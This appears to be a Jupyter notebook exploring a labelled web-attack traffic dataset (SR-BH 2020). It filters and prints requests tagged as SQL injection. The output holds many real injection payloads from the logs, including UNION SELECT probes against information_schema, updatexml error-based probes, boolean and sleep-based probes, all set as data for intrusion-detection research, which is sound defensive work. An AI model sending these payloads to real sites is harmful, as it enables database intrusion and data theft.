# SR-BH 2020 Derived Dataset - Exploratory Data Analysis (EDA)

In [4]:
import pandas as pd

PATH = "datasets/data_capec_multilabel.csv"

df = pd.read_csv(PATH)

C:\Users\eEren\AppData\Local\Temp\ipykernel_1488\2222415154.py:5: DtypeWarning: Columns (9,11,12,13,14,15,16,18,19) have mixed types. Specify dtype option on import or set low_memory=False.
  df = pd.read_csv(PATH)

In [2]:
df.head()

,timestamp,src_ip,src_port,dst_ip,dst_port,request_http_method,request_http_request,request_http_protocol,request_user_agent,request_referer,...,126 - Path Traversal,66 - SQL Injection,16 - Dictionary-based Password Attack,310 - Scanning for Vulnerable Software,153 - Input Data Manipulation,248 - Command Injection,274 - HTTP Verb Tampering,194 - Fake the Source of Data,34 - HTTP Response Splitting,33 - HTTP Request Smuggling
0,17/Jul/2020:12:23:34 +0100,172.26.0.1,55894.0,172.26.0.4,80.0,GET,/,HTTP/1.1,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3...,NaN,...,0,0,0,0,0,0,0,0,0,0
1,17/Jul/2020:12:23:41 +0100,172.26.0.1,55897.0,172.26.0.4,80.0,GET,/blog/index.php/2020/04/04/voluptatum-reprehen...,HTTP/1.1,Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; r...,NaN,...,0,0,0,0,0,0,0,0,0,0
2,17/Jul/2020:12:23:51 +0100,172.26.0.1,55901.0,172.26.0.4,80.0,GET,/blog/xmlrpc.php?rsd,HTTP/1.1,Mozilla/4.0 (compatible; MSIE 6.0; Windows NT ...,NaN,...,0,0,0,0,0,0,0,0,0,0
3,17/Jul/2020:12:23:51 +0100,172.26.0.1,55902.0,172.26.0.4,80.0,GET,/,HTTP/1.1,Mozilla/5.0 (Linux; Android 4.2.2; SM-T110 Bui...,NaN,...,0,0,0,0,0,0,0,0,0,0
4,17/Jul/2020:12:23:58 +0100,172.26.0.1,55903.0,172.26.0.4,80.0,GET,/blog/index.php/2020/04/04/nihil-tenetur-et-ad...,HTTP/1.1,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2...,NaN,...,0,0,0,0,0,0,0,0,0,0

In [3]:
df.columns

Index(['timestamp', 'src_ip', 'src_port', 'dst_ip', 'dst_port',
       'request_http_method', 'request_http_request', 'request_http_protocol',
       'request_user_agent', 'request_referer', 'request_host',
       'request_origin', 'request_cookie', 'request_content_type',
       'request_accept', 'request_accept_language', 'request_accept_encoding',
       'request_do_not_track', 'request_connection', 'request_body',
       'response_http_protocol', 'response_http_status_code',
       'response_http_status_message', 'response_content_length',
       '000 - Normal', '272 - Protocol Manipulation', '242 - Code Injection',
       '88 - OS Command Injection', '126 - Path Traversal',
       '66 - SQL Injection', '16 - Dictionary-based Password Attack',
       '310 - Scanning for Vulnerable Software',
       '153 - Input Data Manipulation', '248 - Command Injection',
       '274 - HTTP Verb Tampering', '194 - Fake the Source of Data',
       '34 - HTTP Response Splitting', '33 - HTTP Request Smuggling'],
      dtype='object')

In [4]:
df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 907815 entries, 0 to 907814
Data columns (total 38 columns):
 #   Column                                  Non-Null Count   Dtype
---  ------                                  --------------   -----
 0   timestamp                               907813 non-null  object
 1   src_ip                                  907813 non-null  object
 2   src_port                                907813 non-null  float64
 3   dst_ip                                  907813 non-null  object
 4   dst_port                                907813 non-null  float64
 5   request_http_method                     907813 non-null  object
 6   request_http_request                    907813 non-null  object
 7   request_http_protocol                   907813 non-null  object
 8   request_user_agent                      903981 non-null  object
 9   request_referer                         291394 non-null  object
 10  request_host                            907781 non-null  object
 11  request_origin                          1609 non-null    object
 12  request_cookie                          445262 non-null  object
 13  request_content_type                    28544 non-null   object
 14  request_accept                          381783 non-null  object
 15  request_accept_language                 15860 non-null   object
 16  request_accept_encoding                 366300 non-null  object
 17  request_do_not_track                    705 non-null     float64
 18  request_connection                      482860 non-null  object
 19  request_body                            26743 non-null   object
 20  response_http_protocol                  907813 non-null  object
 21  response_http_status_code               907813 non-null  float64
 22  response_http_status_message            907813 non-null  object
 23  response_content_length                 904523 non-null  float64
 24  000 - Normal                            907815 non-null  int64
 25  272 - Protocol Manipulation             907815 non-null  int64
 26  242 - Code Injection                    907815 non-null  int64
 27  88 - OS Command Injection               907815 non-null  int64
 28  126 - Path Traversal                    907815 non-null  int64
 29  66 - SQL Injection                      907815 non-null  int64
 30  16 - Dictionary-based Password Attack   907815 non-null  int64
 31  310 - Scanning for Vulnerable Software  907815 non-null  int64
 32  153 - Input Data Manipulation           907815 non-null  int64
 33  248 - Command Injection                 907815 non-null  int64
 34  274 - HTTP Verb Tampering               907815 non-null  int64
 35  194 - Fake the Source of Data           907815 non-null  int64
 36  34 - HTTP Response Splitting            907815 non-null  int64
 37  33 - HTTP Request Smuggling             907815 non-null  int64
dtypes: float64(5), int64(14), object(19)
memory usage: 263.2+ MB

In [46]:
sql_injection_bodies = df.loc[
    (df["66 - SQL Injection"] == 1) & df["request_body"].notna(),
    ["timestamp", "request_http_request", "request_body","66 - SQL Injection" , "request_http_method"]
]

sql_injection_bodies

,timestamp,request_http_request,request_body,66 - SQL Injection,request_http_method
19354,17/Jul/2020:21:48:08 +0200,/blog/index.php/my-account/edit-password/,username=enragedMandrill8&password=n$Y#pQ5g&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=c%3A%2F&login=Login&redirect=&rememberme=forever,1,POST
19357,17/Jul/2020:21:48:08 +0200,/blog/index.php/my-account/edit-password/,username=sadTortoise9&password=E4hw4G&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=c%3A%5C&login=Login&redirect=&rememberme=forever,1,POST
19825,17/Jul/2020:21:49:21 +0200,/c%3A%5C/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D,username=pitifulCoati0&password=Ujr#q4&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2Fpost.php%2F%3Faction%3Dedit%26post%3D%257B%257B%2520data.id%2520%257D%257D&login=Login&redirect=&rememberme=forever,1,POST
19842,17/Jul/2020:21:49:22 +0200,/blog/c%3A%5C/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D,username=chicRhino3&password=6qBp4&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-profile%2Fpost.php%2F%3Faction%3Dedit%26post%3D%257B%257B%2520data.id%2520%257D%257D&login=Login&redirect=&rememberme=forever,1,POST
21366,17/Jul/2020:21:52:30 +0200,/blog/index.php/my-account/edit-profile/,username=debonairBoars6&password=QT8dYKd&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=c%3A%5C&login=Login&redirect=&rememberme=forever,1,POST
...,...,...,...,...,...
515393,19/Jul/2020:11:27:17 +0200,/blog/%3C%21--?action=lostpassword,user_login=solidMallard2&redirect_to=&wp-submit=Get+New+Password,1,POST
515395,19/Jul/2020:11:27:17 +0200,/blog/%5D%5D%3E?action=lostpassword,user_login=panickyMallard4&redirect_to=&wp-submit=Get+New+Password,1,POST
540245,19/Jul/2020:11:47:32 +0200,/blog/index.php/nobis-tenetur-exercitationem-similique/feed/5iqa0l8or3,"""kPImpIFKgT6nmzk"":""sPpGz9wqdKP4uvh""",1,PATCH
540714,19/Jul/2020:11:47:59 +0200,/blog/index.php/search/employee/7ko2or0ysg,"""iJoHQv6FebfsjC4"":""NAEWoLeBLokLZCD""",1,PATCH
543741,19/Jul/2020:11:50:15 +0200,/blog/wp-login.php?action=register%2526zap%253Dzaproxy&redirect_to=%2526zap%253Dzaproxy&user_email=foo-bar%2540example.com%2526zap%253Dzaproxy&user_email=foo-bar@example.com%2526zap%253Dzaproxy&user_login=dejectedRice9%2526zap%253Dzaproxy&wp-submit=Register%2526zap%253Dzaproxy,user_login=dejectedRice9&user_email=foo-bar%40example.com&redirect_to=&wp-submit=Register,1,POST

In [62]:
sql_injection_bodies["request_http_method"].value_counts()

request_http_method
POST     9886
PATCH       2
Name: count, dtype: int64

In [ ]:
sql_injection_bodies_modified = df.loc[
    (df["66 - SQL Injection"] == 1) & (df["request_http_method"] == "POST")
    ["timestamp", "request_http_request", "request_body","66 - SQL Injection" , "request_http_method"]
]

sql_injection_bodies_modified

,timestamp,request_http_request,request_body,66 - SQL Injection,request_http_method
3121,17/Jul/2020:19:25:48 +0200,"/blog/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,buttons,forms,l10n,login&ver=4.9.5",NaN,1,GET
4255,17/Jul/2020:19:33:20 +0200,"/blog/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,buttons,forms,l10n,login&ver=4.9.5",NaN,1,GET
4753,17/Jul/2020:19:35:54 +0200,"/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)",NaN,1,GET
7159,17/Jul/2020:20:01:20 +0200,"/blog/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,buttons,forms,l10n,login&ver=4.9.5",NaN,1,GET
7194,17/Jul/2020:20:05:55 +0200,"/?p4yl04d2=1%20UNION%20ALL%20SELECT%201,2,3,table_name%20FROM%20information_schema.tables",NaN,1,GET
...,...,...,...,...,...
543739,19/Jul/2020:11:50:15 +0200,/blog/wp-login.php?log=rafael%2526zap%253Dzaproxy&pwd=%2526zap%253Dzaproxy&redirect_to=http://test-site.com/blog/wp-admin/%2526zap%253Dzaproxy&rememberme=forever%2526zap%253Dzaproxy&testcookie=1%2526zap%253Dzaproxy&wp-submit=Log%20In%2526zap%253Dzaproxy,NaN,1,GET
543740,19/Jul/2020:11:50:15 +0200,/blog/wp-login.php?action=lostpassword%2526zap%253Dzaproxy&redirect_to=%2526zap%253Dzaproxy&user_login=%2526zap%253Dzaproxy&wp-submit=Get%20New%20Password%2526zap%253Dzaproxy,NaN,1,GET
543742,19/Jul/2020:11:50:16 +0200,/blog/wp-login.php?log=%2526zap%253Dzaproxy&loggedout=true%2526zap%253Dzaproxy&pwd=%2526zap%253Dzaproxy&redirect_to=http://test-site.com/blog/wp-admin/%2526zap%253Dzaproxy&rememberme=forever%2526zap%253Dzaproxy&testcookie=1%2526zap%253Dzaproxy&wp-submit=Log%20In%2526zap%253Dzaproxy,NaN,1,GET
544220,19/Jul/2020:12:35:04 +0200,"/blog/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,buttons,forms,l10n,login&ver=4.9.5",NaN,1,GET
544221,19/Jul/2020:12:35:04 +0200,"/blog/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,buttons,forms,l10n,login&ver=4.9.5",NaN,1,GET

In [61]:
sql_injection_bodies_modified["request_http_method"].value_counts()

request_http_method
GET    239497
Name: count, dtype: int64

In [12]:
sql_injection_bodies["request_http_request"].value_counts()

request_http_request
/blog/index.php/my-account/edit-profile/                                              940
/blog/index.php/my-account/                                                           873
/blog/wp-comments-post.php                                                            851
/blog/index.php/my-account/edit-password/                                             807
/blog/index.php/registration/                                                         524
                                                                                     ...
/blog/index.php/my-account+AND+1%3D1/edit-profile?mode=grid                             1
/blog/index.php/my-account%27+AND+%271%27%3D%271/edit-profile?mode=grid                 1
/blog/index.php/my-account%22+AND+%221%22%3D%221/edit-profile?mode=grid                 1
/blog/index.php/my-account+OR+1%3D1+--+/edit-profile?mode=grid                          1
/blog%27+and+0+in+%28select+sleep%2815%29+%29+--+/index.php/my-account/user-logout      1
Name: count, Length: 2272, dtype: int64

In [47]:
sql_injection_bodies["request_http_method"].unique()

array(['POST', 'PATCH'], dtype=object)

In [14]:
sql_injection_bodies["request_body"].isnull().sum()

np.int64(0)

In [15]:
sql_injection_bodies["request_body"]

19354     username=enragedMandrill8&password=n$Y#pQ5g&us...
19357     username=sadTortoise9&password=E4hw4G&user-reg...
19825     username=pitifulCoati0&password=Ujr#q4&user-re...
19842     username=chicRhino3&password=6qBp4&user-regist...
21366     username=debonairBoars6&password=QT8dYKd&user-...
                                ...
515393    user_login=solidMallard2&redirect_to=&wp-submi...
515395    user_login=panickyMallard4&redirect_to=&wp-sub...
540245                  "kPImpIFKgT6nmzk":"sPpGz9wqdKP4uvh"
540714                  "iJoHQv6FebfsjC4":"NAEWoLeBLokLZCD"
543741    user_login=dejectedRice9&user_email=foo-bar%40...
Name: request_body, Length: 9888, dtype: object

In [24]:
pd.set_option("display.max_colwidth", None)

for idx, body in sql_injection_bodies["request_body"].items():
    if "UNION" in str(body):
        print(f"Index: {idx}")
        print(body)
        print("-" * 100)

Index: 149414
password_current=rJWmw&+UNION+ALL+select+NULL+--+&password_1=rJWmw&&password_2=rJWmw&&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149415
password_current=SVKg!%27+UNION+ALL+select+NULL+--+&password_1=SVKg!&password_2=SVKg!&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149416
password_current=SP$H6%22+UNION+ALL+select+NULL+--+&password_1=SP$H6&password_2=SP$H6&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149418
password_current=Y1zUd&%29+UNION+ALL+select+NULL+--+&password_1=Y1zUd&&password_2=Y1zUd&&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149420
password_current=Q1M4vvB-%27%29+UNION+ALL+select+NULL+--+&password_1=Q1M4vvB-&password_2=Q1M4vvB-&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149422
password_current=ihzOOk%22%29+UNION+ALL+select+NULL+--+&password_1=ihzOOk&password_2=ihzOOk&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149475
password_current=76MdjQAj&password_1=76MdjQAj+UNION+ALL+select+NULL+--+&password_2=76MdjQAj&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149477
password_current=qBfMR01B&password_1=qBfMR01B%27+UNION+ALL+select+NULL+--+&password_2=qBfMR01B&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149479
password_current=!dY2rTU&password_1=!dY2rTU%22+UNION+ALL+select+NULL+--+&password_2=!dY2rTU&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149481
password_current=j6GH9&password_1=j6GH9%29+UNION+ALL+select+NULL+--+&password_2=j6GH9&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149483
password_current=_*OLh&password_1=_*OLh%27%29+UNION+ALL+select+NULL+--+&password_2=_*OLh&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149485
password_current=*raUEP&password_1=*raUEP%22%29+UNION+ALL+select+NULL+--+&password_2=*raUEP&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149487
username=wearyBagels1+UNION+ALL+select+NULL+--+&password=t2mbgRs&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149488
username=madBuck3%27+UNION+ALL+select+NULL+--+&password=wJc&2Ba3&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149489
username=worldlyAntelope1%22+UNION+ALL+select+NULL+--+&password=wWyqk&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149490
username=vengefulTeal8%29+UNION+ALL+select+NULL+--+&password=XSbtfL&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149491
username=wrathfulBobolink7%27%29+UNION+ALL+select+NULL+--+&password=v2oMt*XG&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149492
username=dearWildfowl4%22%29+UNION+ALL+select+NULL+--+&password=az_WjVL&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149524
password_current=DaGQ&&password_1=DaGQ&&password_2=DaGQ&+UNION+ALL+select+NULL+--+&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149526
password_current=#TslPE-&password_1=#TslPE-&password_2=#TslPE-%27+UNION+ALL+select+NULL+--+&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149528
password_current=fEtPHu&password_1=fEtPHu&password_2=fEtPHu%22+UNION+ALL+select+NULL+--+&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149530
password_current=7fx-A$CM&password_1=7fx-A$CM&password_2=7fx-A$CM%29+UNION+ALL+select+NULL+--+&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149532
password_current=mvdF8V&password_1=mvdF8V&password_2=mvdF8V%27%29+UNION+ALL+select+NULL+--+&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149534
password_current=mRXrfwyw&password_1=mRXrfwyw&password_2=mRXrfwyw%22%29+UNION+ALL+select+NULL+--+&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149539
username=somberChile9&password=I7ZI&+UNION+ALL+select+NULL+--+&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149540
username=jubilantMacaw2&password=VJ5lz4%27+UNION+ALL+select+NULL+--+&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149541
username=affectedPonie4&password=oOPtKLP%22+UNION+ALL+select+NULL+--+&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149542
username=wearyCardinal9&password=yf*iGI%29+UNION+ALL+select+NULL+--+&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149543
username=grizzledBagels7&password=d0PE3%27%29+UNION+ALL+select+NULL+--+&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149544
username=humorousTomatoe4&password=S9q3N02m%22%29+UNION+ALL+select+NULL+--+&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149571
password_current=q7Lh#ZM6&password_1=q7Lh#ZM6&password_2=q7Lh#ZM6&_wpnonce=b9dad6a8b5+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149572
password_current=Rl6cIr&password_1=Rl6cIr&password_2=Rl6cIr&_wpnonce=b9dad6a8b5%27+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149574
password_current=8swnpg3D&password_1=8swnpg3D&password_2=8swnpg3D&_wpnonce=b9dad6a8b5%22+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149576
password_current=kodpGg#a&password_1=kodpGg#a&password_2=kodpGg#a&_wpnonce=b9dad6a8b5%29+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149577
password_current=i$!bYg2&password_1=i$!bYg2&password_2=i$!bYg2&_wpnonce=b9dad6a8b5%27%29+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149578
password_current=!d_M&a&password_1=!d_M&a&password_2=!d_M&a&_wpnonce=b9dad6a8b5%22%29+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149579
username=awedMackerel0&password=KhN5NKn3&user-registration-login-nonce=6eac0e2d5f+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149580
username=annoyedCheese2&password=27WJO&user-registration-login-nonce=6eac0e2d5f%27+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149581
username=worriedSwift8&password=&orGIt&user-registration-login-nonce=6eac0e2d5f%22+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149582
username=grizzledPolenta2&password=ZRHCr5-e&user-registration-login-nonce=6eac0e2d5f%29+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149583
username=fondPonie7&password=Bqil_XNs&user-registration-login-nonce=6eac0e2d5f%27%29+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149584
username=blissfulAntelope6&password=zTMh-DJU&user-registration-login-nonce=6eac0e2d5f%22%29+UNION+ALL+select+NULL+--+&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149605
password_current=M0*T$x&password_1=M0*T$x&password_2=M0*T$x&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F+UNION+ALL+select+NULL+--+&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149606
password_current=PjW_MkZ&password_1=PjW_MkZ&password_2=PjW_MkZ&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%27+UNION+ALL+select+NULL+--+&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149607
password_current=b36L*JU&password_1=b36L*JU&password_2=b36L*JU&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%22+UNION+ALL+select+NULL+--+&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149608
password_current=WC#2F&password_1=WC#2F&password_2=WC#2F&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%29+UNION+ALL+select+NULL+--+&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149609
password_current=*Q8jn&password_1=*Q8jn&password_2=*Q8jn&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%27%29+UNION+ALL+select+NULL+--+&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149610
username=grumpyUnicorn8&password=fcJ4ioqO&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F+UNION+ALL+select+NULL+--+&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149611
password_current=iaDLTFej&password_1=iaDLTFej&password_2=iaDLTFej&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%22%29+UNION+ALL+select+NULL+--+&save_change_password=Save+changes&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149612
username=cockyCrackers3&password=farhn5&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%27+UNION+ALL+select+NULL+--+&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149613
username=trustingLion8&password=m#x#pIg&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%22+UNION+ALL+select+NULL+--+&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149614
username=ferventTruffle9&password=Zfcxv&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%29+UNION+ALL+select+NULL+--+&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149615
username=shyWhiting5&password=VqCd#Bak&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%27%29+UNION+ALL+select+NULL+--+&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149616
username=goofyCurlew4&password=RHRs-yY&user-registration-login-nonce=6eac0e2d5f&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F%22%29+UNION+ALL+select+NULL+--+&login=Login&redirect=&rememberme=forever
----------------------------------------------------------------------------------------------------
Index: 149644
password_current=kdc#jeW&password_1=kdc#jeW&password_2=kdc#jeW&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes+UNION+ALL+select+NULL+--+&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149647
password_current=nQr6H6i&password_1=nQr6H6i&password_2=nQr6H6i&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes%27+UNION+ALL+select+NULL+--+&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149648
